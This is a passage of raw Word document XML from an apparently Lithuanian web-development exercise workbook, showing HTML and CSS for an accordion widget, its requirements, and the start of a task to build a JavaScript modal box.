      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;/head&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body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>&lt;h1&gt;WEB technologies&lt;/h1&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ab/>
        <w:t>&lt;div class="accordion"&gt;</w:t>
      </w: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header"&gt;HTML&lt;/div&gt;</w:t>
      </w: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content"&gt;HTML is the standard markup language for creating Web pages.&lt;/div&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header"&gt;CSS&lt;/div&gt;</w:t>
      </w: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content"&gt;CSS stands for Cascading Style Sheets.CSS describes how HTML elements are to be displayed on screen, paper, or in other media.&lt;/div&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header"&gt;JavaScript&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>&lt;div class="accordion-content"&gt;JavaScript is a scripting or programming language that allows you to implement complex things on web pages&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;/body&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html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E562B0" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      2</w:t>
      </w:r>
      <w:r w:rsidR="0033117F" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:t>style.css</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>html {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>min-height: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-family: 'Nunito', sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>-webkit-font-smoothing: antialiased;</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ody {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: linear-gradient(to bottom right, #56ab2f, #a8e063);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>line-height: 1.5;</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h1 {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-weight: 200;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-size: 3rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>color: white;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>text-align: center;</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cordion {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: linear-gradient(to bottom right, white, #F8F8F8);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>max-width: 400px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: white;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>margin: 0 auto;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    box-shadow: 0 15px 20px -15px rgba(0, 0, 0, 0.3), 0 35px 50px -25px rgba(0, 0, 0, 0.3), 0 85px 60px -25px rgba(0, 0, 0, 0.1);</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cordion-header {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>border-bottom: 1px solid #DDE0E7;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>color: #2a313a;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-weight: 700;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>padding: 1.5rem;</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cordion-header:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: #F6F7F9;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:lastRenderedPageBreak/>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cordion-content {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>display: none;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>border-bottom: 1px solid #DDE0E7;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: #F6F7F9;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>padding: 1.5rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>color: #4a5666;</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cordion-header::before {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>content: '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>vertical-align: middle;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>display: inline-block;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>width: .75rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>height: .75rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>border-radius: 50%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background-color: #B1B5BE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>margin-right: .75rem;</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active.accordion-header::before {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background-color: #d66d75 ;</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ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Reikalavimai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F653D8" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:t>HTML dokumente užrašyti nuorodas į stiliaus ir skripto failus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F653D8" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:t>Naudojant selektorius, įvykius, metodus darbui su CSS klasėmis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pavyzdys:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="503CB0F3" wp14:editId="435D3BFC">
            <wp:extent cx="2239645" cy="1788795"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="180"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9645" cy="1788795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AD306FD" wp14:editId="3CC00CF3">
            <wp:extent cx="2252980" cy="2199640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="181"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52980" cy="2199640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>3 užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="00043032">
        <w:t xml:space="preserve"> SUKURKITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> IŠŠOKANTĮ LANGĄ (MODAL BOX)</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: naudojant JavaScript, užrašyti skriptą, kuris atvertų informacinį lauką (Modal Box), kai yra paspaustas mygtukas „open“. Iššokantis langas užsidaro kai paspaudžiamas mygtukas „close“ arba nuspaustus klaviatūroje „Esc“. </w:t>
      </w:r>
